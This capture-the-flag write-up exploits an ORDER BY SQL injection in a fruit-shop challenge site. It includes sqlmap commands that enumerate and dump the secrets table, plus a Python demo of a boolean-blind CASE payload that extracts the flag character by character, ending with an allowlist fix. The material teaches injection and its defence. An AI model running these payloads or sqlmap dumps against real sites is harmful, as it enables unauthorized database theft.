CrySyS Novice Group - Sorting Fruits writeup (1)

This task was given as homework in the CrySyS Novice Group. It was under the “Shop of Quality Lime (and other fruits)” group and was worth 50 points (first level).

Description: This is the first version of our website. We believe it is absolutely secure, but you can prove us wrong.

I was given an address (let’s say it was http://someaddress.com), and on that site there was a table like this:

| id | name | description | price |
|----|------|-------------|-------|
| 1 | Kiwi | Green | 15 |
| 2 | Apple | Yummy | 10 |
| 3 | Water Mellon | Green | 30 |
| 4 | Potato | For french fries | 40 |
| 5 | Ananas | For pizza | 5 |
| 6 | Secrets are in an other table | | 100 |

In this table the items are sorted by their id; clicking any other column header reorders them by that column. The chosen ordering is passed to the web server in a GET request through an ‘order’ parameter, so sorting by ‘id’ looked like this:

http://someaddress.com/?order=id

So I quickly checked for the possibility of an SQL injection by appending an apostrophe to the parameter value:

http://someaddress.com/?order=id'

This caused the following warning message:

Warning: mysql_fetch_row() expects parameter 1 to be resource,  
boolean given in /app/index.php on line 23

Now I know that SQL injection might be possible, since the input is clearly not handled properly: the apostrophe broke the query, mysql_query() returned false instead of a result resource, and mysql_fetch_row() complained about it. There is a hint on the site which says that secrets are in another table, so we need to find that table and then dump its data.

For this job I used sqlmap. To list the database names I ran the following (--technique="B" restricts sqlmap to boolean-based blind injection, which is what an error-free ORDER BY injection gives us; the --threads argument is optional, it just makes it much faster):

python sqlmap.py -u "http://someaddress.com/?order=id"  
--dbs --technique="B" --threads 4

This gave me the usual MySQL system databases plus an extra one called test.

available databases [4]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] test

Now I needed to find out the names of the tables in the test database.

python sqlmap.py -u "http://someaddress.com/?order=id"  
--technique="B" --threads 4 -D test --tables

I got this:

+----------+  
| products |  
| secrets  |  
+----------+

And finally I dumped the contents of the secrets table.

python sqlmap.py -u "http://someaddress.com/?order=id"  
--technique="B" --threads 4 -D test -T secrets --dump

+-----------------------------------------+  
| secret                                  |  
+-----------------------------------------+  
| OUR_APPLE_IS_NOT_AS_YUMMY_AS_ADVERTISED |  
+-----------------------------------------+

And here it is, we got our flag.
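What was actually happening underneath, both in the apostrophe test and in sqlmap’s boolean-based mode, as an added example that is not part of the original writeup or of the challenge’s own code. It uses SQLite in place of the site’s MySQL backend, a hypothetical list_products_vulnerable() handler standing in for index.php, table data constructed from the page, and an assumed flag alphabet (uppercase letters and underscore). The allowlisted handler at the end is the fix this kind of sort parameter needs: ORDER BY cannot take a bound parameter, so escaping is not an option and only known column names should be accepted.

```python
import sqlite3
import string

# Constructed sample data mirroring the table the page shows; the secret is
# the flag the writeup dumped. SQLite stands in for the site's MySQL backend.
PRODUCTS = [
    (1, "Kiwi", "Green", 15),
    (2, "Apple", "Yummy", 10),
    (3, "Water Mellon", "Green", 30),
    (4, "Potato", "For french fries", 40),
    (5, "Ananas", "For pizza", 5),
    (6, "Secrets are in an other table", "", 100),
]
SECRET = "OUR_APPLE_IS_NOT_AS_YUMMY_AS_ADVERTISED"


def make_db():
    """In-memory database with the two tables sqlmap found in 'test'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price INTEGER)")
    db.execute("CREATE TABLE secrets (secret TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", PRODUCTS)
    db.execute("INSERT INTO secrets VALUES (?)", (SECRET,))
    return db


def list_products_vulnerable(db, order):
    """Hypothetical stand-in for the site's index.php: the value of the
    'order' GET parameter is concatenated straight into ORDER BY."""
    sql = "SELECT id, name, description, price FROM products ORDER BY " + order
    return db.execute(sql).fetchall()


def query_succeeds(db, order):
    """The writeup's first probe: does the page still render with this value?
    A stray apostrophe makes the statement unparsable; the PHP app showed that
    as the mysql_fetch_row() warning because mysql_query() had returned false."""
    try:
        list_products_vulnerable(db, order)
        return True
    except sqlite3.OperationalError:
        return False


def oracle(db, condition):
    """Boolean-based blind oracle (what sqlmap's --technique=B automates).
    The injected CASE picks the sort key: if `condition` holds, the rows come
    back ordered by id (Kiwi first), otherwise by price (Ananas first)."""
    payload = "(CASE WHEN (%s) THEN id ELSE price END)" % condition
    rows = list_products_vulnerable(db, payload)
    return rows[0][1] == "Kiwi"


def extract_secret(db, alphabet=string.ascii_uppercase + "_"):
    """Recover secrets.secret one character at a time through the oracle.
    The alphabet is an assumption that fits this flag; a real run would
    bisect over character codes instead of trying literals."""
    secret = ""
    while True:
        position = len(secret) + 1
        for ch in alphabet:
            cond = "(SELECT substr(secret, %d, 1) FROM secrets) = '%s'" % (position, ch)
            if oracle(db, cond):
                secret += ch
                break
        else:
            return secret  # nothing matched: we are past the end of the value


ALLOWED_ORDER = ("id", "name", "description", "price")


def list_products_fixed(db, order):
    """ORDER BY cannot take a bound parameter, so the fix is an allowlist of
    column names rather than escaping; anything else is rejected outright."""
    if order not in ALLOWED_ORDER:
        raise ValueError("unsupported order column")
    sql = "SELECT id, name, description, price FROM products ORDER BY " + order
    return db.execute(sql).fetchall()


def fixed_accepts(db, order):
    """True if the hardened handler would run the query for this value."""
    try:
        list_products_fixed(db, order)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("order=id renders:", query_succeeds(db, "id"))
    print("order=id' breaks the query:", not query_succeeds(db, "id'"))
    print("extracted secret:", extract_secret(db))
    print("fixed handler accepts CASE payload:",
          fixed_accepts(db, "(CASE WHEN 1=1 THEN id ELSE price END)"))
```

Two things differ on a real MySQL target. First, the site never showed query results for the payload, only a different row order, which is exactly why sqlmap needed the boolean technique rather than a UNION. Second, MySQL’s default collations are case-insensitive, so a plain `= 'O'` comparison would also match `o`; tooling compares character codes (ORD/ASCII) or uses a binary collation to avoid that.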

To read about the next level click here: Sorting Encrypted Fruits
